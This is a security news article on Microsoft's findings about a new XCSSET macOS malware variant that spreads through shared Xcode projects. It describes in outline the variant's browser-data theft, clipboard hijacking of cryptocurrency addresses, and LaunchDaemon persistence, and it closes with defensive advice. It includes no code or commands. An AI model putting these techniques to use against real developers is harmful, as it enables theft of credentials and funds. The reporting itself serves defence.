Sign in Subscribe

New XCSSET Malware Variant Targets macOS Xcode Developers

New XCSSET Malware Variant Targets macOS Xcode Developers

Microsoft Threat Intelligence specialists have identified a new variant of the XCSSET malware for macOS. This version introduces features for monitoring the system clipboard to intercept cryptocurrency transactions and employs new persistence methods to maintain a foothold on infected devices.

Background on XCSSET

XCSSET is modular malware designed for macOS with capabilities for stealing sensitive data and cryptocurrency. It targets:

  • Apple Notes
  • Cryptocurrency wallets
  • Browser-stored credentials and data

The malware propagates by infecting other Xcode projects on a victim’s device. Once a compromised project is shared and built, the malicious code executes automatically.

“XCSSET is designed to infect Xcode projects, which are commonly used by software developers, and executes during the build process,” Microsoft explains. “We believe this infection and distribution method relies on project files being shared among developers of Apple or macOS applications.”

What’s New in the Variant

Researchers highlight several new capabilities in the updated malware:

  • Browser data theft: Attempts to steal information from Firefox by deploying a modified version of HackBrowserData, an open-source tool that decrypts and exports browser data.
  • Clipboard hijacking: Monitors the macOS clipboard for cryptocurrency addresses (using regular expression patterns). When detected, the malware replaces the address with one belonging to the attacker, redirecting funds.
  • Persistence mechanisms: Establishes longevity by creating LaunchDaemon entries that execute a payload from ~/.root, and disguises itself with a fake System Settings.app in /tmp.

Current Scope of Attacks

According to Microsoft, the new variant has not yet reached widespread distribution, though it has already been observed in limited attacks.

Researchers have reported their findings to Apple and are collaborating with GitHub to take down repositories associated with XCSSET.

Defensive Recommendations

Security specialists recommend:

  • Keeping macOS and applications fully updated (given XCSSET’s history of exploiting zero-day vulnerabilities).
  • Verifying Xcode projects before building them, especially when projects are obtained from external sources.

Read next